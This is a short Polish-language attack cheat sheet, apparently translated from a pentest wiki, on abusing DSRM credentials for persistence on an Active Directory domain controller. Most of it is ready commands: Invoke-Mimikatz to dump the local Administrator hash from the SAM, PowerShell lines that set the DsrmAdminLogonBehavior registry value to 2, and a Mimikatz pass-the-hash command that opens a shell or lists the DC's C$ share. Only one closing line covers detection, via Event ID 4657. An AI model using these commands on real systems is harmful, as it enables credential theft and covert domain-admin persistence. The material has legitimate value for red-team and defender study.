Poświadczenia DSRM

W każdym DC znajduje się lokalne konto administratora. Posiadając uprawnienia administratora na tym komputerze, możesz użyć mimikatz, aby wydobyć skrót lokalnego hasła Administratora. Następnie, modyfikując rejestr, aktywujesz to hasło, dzięki czemu możesz zdalnie uzyskać dostęp do tego lokalnego użytkownika Administratora. Najpierw musimy wydobyć skrót hasła lokalnego użytkownika Administratora wewnątrz DC:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Następnie musimy sprawdzić, czy to konto będzie działać, a jeśli klucz rejestru ma wartość "0" lub nie istnieje, musisz ustawić go na "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Następnie, używając PTH, możesz wyświetlić zawartość C$ lub nawet uzyskać powłokę. Zauważ, że aby utworzyć nową sesję PowerShell z tym hasłem w pamięci (dla PTH), "domena" używana to po prostu nazwa maszyny DC:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Więcej informacji na ten temat znajdziesz tutaj: https://adsecurity.org/?p=1714 i https://adsecurity.org/?p=1785

Zapobieganie

• Identyfikator zdarzenia 4657 - Audyt tworzenia/zmiany HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior